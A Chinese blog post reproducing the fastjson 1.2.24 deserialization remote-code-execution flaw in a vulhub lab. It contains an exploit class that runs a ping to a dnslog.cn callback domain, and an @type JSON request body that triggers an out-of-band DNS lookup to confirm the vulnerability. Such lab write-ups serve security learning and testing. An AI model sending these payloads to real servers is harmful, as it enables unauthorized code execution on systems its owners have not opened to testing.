首页 > 其他分享 >fastjson(版本<=1.2.24)复现

fastjson(版本<=1.2.24)复现

时间:2024-06-13 22:57:53浏览次数:20  
标签:fastjson 24 java 1.2 漏洞 JSON 序列化 type

文章目录

1.啥是JSON介绍:

JSON,全称:JavaScript Object Notation,作为一个常见的轻量级的数据交换格式,应该在一个程序员的开发生涯中是常接触的。简洁和清晰的层次结构使得 JSON 成为理想的数据交换语言。 易于人阅读和编写,同时也易于机器解析和生成,并有效地提升网络传输效率。
即JavaScript对象标记法,使用键值对进行信息的存储。举个简单的例子如下:

{
        "name":"hang",

        "age":19,

        "media":["CSDN","bilibili","Github"]
}
json本质就是一种字符串,用于信息的存储和交换。

2.啥是fastjson?

fastjson 是一个 有阿里开发的一个开源Java 类库,可以将 Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。

3.fastjson序列化/反序列化原理

fastjson的漏洞本质还是一个java的反序列化漏洞,由于引进了AutoType功能,fastjson在对json字符串反序列化的时候,会读取到@type的内容,将json内容反序列化为java对象并调用这个类的setter方法。

4.fastjson反序列化漏洞原理

使用AutoType功能进行序列号的JSON字符会带有一个@type来标记其字符的原始类型,在反序列化的时候会读取这个@type,来试图把JSON内容反序列化到对象,并且会调用这个库的setter或者getter方法,然而,@type的类有可能被恶意构造,只需要合理构造一个JSON,使用@type指定一个想要的攻击类库就可以实现攻击。

$复现流程:

漏洞影响范围:fastjson<=1.2.24

下面仅作漏洞复现记录与实现,利用流程如下:

一、漏洞环境搭建

本文漏洞环境采用vulhub搭建,执行以下命令开启环境

cd /vulhub/fastjson/1.2.24-rce/
docker-compose up -d

执行完毕后访问8090端口,访问如下:请添加图片描述

二、漏洞验证方法一

首先将exp进行编译,将以下内容保存为TouchFile.java

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
  static {
      try {
          Runtime rt = Runtime.getRuntime();
          String[] commands = {"ping", "test.3ztjrz.dnslog.cn"};
          Process pc = rt.exec(commands);
          pc.waitFor();
      } catch (Exception e) {
          // do nothing
      }
  }
}

在这里插入图片描述

三、漏洞验证方法二

先用dnslog外带方式验证一下漏洞存不存在
dnslog地址
DNSLog PlatformDNSLog平台 http://www.dnslog.cn/

在这里插入图片描述

修改数据包
请求方式GET改成POST
加上Content-Type:application/json 请求头字段
加请求体数据,内容如下

{
	"a":{
	"@type":"java.net.Inet4Address",
	"val":"申请的域名"
	}
}

在这里插入图片描述

再刷新dnslog页面,查看有无变化
发现有记录了,能收到靶场发来的内容,说明存漏洞
在这里插入图片描述

关闭靶场docker stop id

在这里插入图片描述

标签:fastjson,24,java,1.2,漏洞,JSON,序列化,type
From: https://blog.csdn.net/kui576/article/details/139664584

相关文章

  • 24-06-13
    是否可以继承String?String类是final类,不能被继承.继承String本身就是一个错误行为,对String类型最好的重写方式是关联关系(Has-A)和依赖关系(Use-A)而不是继承关系重载(overload)和重写(override)的区别?重载的方法能否根据返回类型进行区分?方法的重载和重写都是实现多态的方式,区别在于......
  • fastjson2自动转型
    新版本fastjson2auto-type的写法。自定义Cache,或者写RedisSerializer估计会用到这个知识,importcn.seaboot.commons.lang.Warning;importcom.alibaba.fastjson2.JSON;importcom.alibaba.fastjson2.JSONReader;importcom.alibaba.fastjson2.JSONWriter;/***fas......
  • 记2024年年中的自我思考
    记2024年年中的自我思考前言这么多年都还没养成写下博客的习惯,总是对自己思考的太多而沉淀的太少是,可能这就是我目前最大的缺陷吧。转眼已经2024年6月份了,在这里还是在这里记录下我对毕业后的年岁至2024年中旬对自己的思考与总结;也算是开始写下第一篇通篇博客吧工作毕业4年了......
  • 2024.6.10漏洞探针
    探针(扫描器)1、nmap漏洞库,根目录下scripts中调用2、Goby(红队版)直接输入ip扫描资产,漏洞库较少;3、Nessus本地安装:下载安装普通版;注册获取验证码;注册用户nessus,nessus123漏洞利用1、工具框架metasploit和searchsploit忍者系统可以一键使用msf;2、单点exp(漏洞库)cnvd、s......
  • 2024中国网络安全产品用户调查报告(发布版)
        自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境......
  • 小红书电商实战营:小红书笔记带货和无人直播,24年6月新课
    课程目录1.我的电商创业经历(余文)_.mp42.为什么现在是入局小红书的最佳红利期(余文)_.mp43,.如何打造高利润直摇间_.mp44.无人直播业务总结(余文)_.mp45.如何用笔记打爆直播间_.mp46.如何根据不同的业务阶段搭建核心团队(理论)_.mp47.学员案例分享_.mp408.学员手册介绍_.mp41......
  • 5.24
    import'package:flutter/material.dart';import'package:test1/page/picture.dart';import'package:test1/page/record_column.dart';import'package:test1/page/video.dart';//导入video1页面import'package:test1/page/rec......
  • 视频生成模型 Dream Machine 开放试用;微软将停止 Copilot GPTs丨 RTE 开发者日报 Vol.
       开发者朋友们大家好: 这里是「RTE开发者日报」,每天和大家一起看新闻、聊八卦。我们的社区编辑团队会整理分享RTE(Real-TimeEngagement)领域内「有话题的新闻」、「有态度的观点」、「有意思的数据」、「有思考的文章」、「有看点的会议」,但内容仅代表编......
  • 【2024最新精简版】Redis面试篇
    文章目录什么是红锁Redis有哪些框架?你们项目中哪里用到了Redis?Redis的常用数据类型有哪些?Redis的数据持久化策略有哪些?Redis的数据过期策略有哪些?Redis的数据淘汰策略有哪些?你们使用Redis是单点还是集群?哪种集群?Redis集群有哪些方案,知道嘛?什么是Red......
  • 2024.6.13
    2024.6.13【痛苦的,热烈的,误解的,无解的,快乐的,解脱的】Thursday五月初八<theme=oi-"gametheory">P4018Roy&October之取石子Roy&October之取石子题目背景Roy和October两人在玩一个取石子的游戏。题目描述游戏规则是这样的:共有\(n\)个石子,两人每次都只能取\(p^......